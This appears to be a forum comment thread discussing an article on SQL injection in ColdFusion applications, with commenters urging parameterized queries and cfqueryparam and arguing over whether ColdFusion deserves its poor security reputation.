SQL Injection Part II? It's a textbook example of SQL injection. I guess it's interesting if you haven't seen one before, but this isn't some new and more evil version of an old attack. It's just the same old attack that's been around since the beginning of SQL-backed applications. The moral of the story is to always validate user input.
All these examples are in ColdFusion and for many years- going back at least 5 years ago when I used it- CF developers have known to use <cfqueryparam> to pass user data to queries. It's the CF equivalent of binding parameters to a query. Every example presented here can easily be protected against using that method.
The only people that have to worry about this are the laziest of the lazy developers.
sigh just use parametrized sql statements. It's really really really not rocket science. If your language/framework doesn't support them, don't use that language/framework.
Sigh, I had really hoped we had gotten past this Coldfusion bashing. CF has an easy barrier to entry so there's a mix of code from poor to excellent.
Lots of open source people bash CF because it's a commercial product. Well in October that's about to change in a big way.
Railo will become the newest member of the JBoss project. There will now be a version of CFML with an LPGL2 license.
PG always celebrates time to market and CFML will quite simply get a startup there faster.
I got hit with this very same attack over July 4th weekend. I inherited an abortion of a site written in "classic" ASP. The attacker inserted javascript links into every VARCHAR database table it could. Took me hours to clean out everything. Taking me even longer to go through and validate all the form posts.
People complain you ought to need a license to have a kid. This kind of crap makes me think you need a license to write a web app.
It's not the fact that the examples are in ColdFusion that makes this article mostly irrelevant. To suggest that it does really just makes you sound ignorant, especially since the particular attack being demonstrated is not language specific.
ColdFusion isn't the best language, but it's certainly not one of the worst either. I think the poor reputation mostly stems from complaints about the joe-shmoe-friendly tag-based syntax and the fact that it's commercial, but most of these probably come from people who have never even used it. I spent some time with it and there are some pretty nifty things you can do with it. The fact that it's built on Java is nice too since you can leverage the entire Java standard library and run on all the so-called enterprise-y application servers all without the pain of having to use Java. This leads to rapid, corporate-friendly development which makes developers and PHBs happy. That's probably there are still lots of businesses out there using it.
MySpace is the largest CF site I'm aware of. I think they actually use the BlueDragon flavor of CF- or at least they did at one time. Most people haven't heard of it, but there's actually another implementation besides the one from Adobe. I remember some talk about MySpace being ported to .NET, but I still see a bunch of .cfm URLs on there so I'm not sure what they're doing.
I don't know what you mean by that security remark. You can develop secure applications in CF just like you can with any other language. Some languages might require some more hoop jumping than others (example: protecting against SQL injection in PHP was a real drag for a long time), but I'm not aware of anything inherent in CF that makes it particularly difficult. In fact, I've found that many things tend to be easier in CF.
Don't get me wrong- I'm not saying everyone should go out and learn ColdFusion. I just think it may be undeserving of the snide comments it seems to attract.
Well, my company funds itself by, amongst other things, going out and breaking web apps, and I'm going to assert without evidence that in both code quality and in environmental security (admin interfaces, etc), CF sites rank at the bottom, and .NET and J2EE sites are neck and neck at the top.
We're a Rails product shop and our dev team is recovery Lisp hippies, so that's not a BigCo bias, it's just the empirical observation.
I won't dispute your results, but those alone are insufficient evidence to suggest any correlation between languages and the ability to develop secure applications. It's a huge leap to say that ApplicationX, developed in Blub++, has more bugs than some completely different application developed in another language, therefore Blub++ is an insecure language.
More likely, the correlation is between security and a number of factors far from choice of language, such as developer experience, diversity of the development team, budget, etc.
Based on my own experience, I've seen that many CF developers are typically less experienced and work in smaller shops so those results aren't the least bit surprising. It's important to keep in mind that they say far more about the developers than the language the application was developed in.
All these examples are in ColdFusion and for many years- going back at least 5 years ago when I used it- CF developers have known to use <cfqueryparam> to pass user data to queries. It's the CF equivalent of binding parameters to a query. Every example presented here can easily be protected against using that method.
The only people that have to worry about this are the laziest of the lazy developers.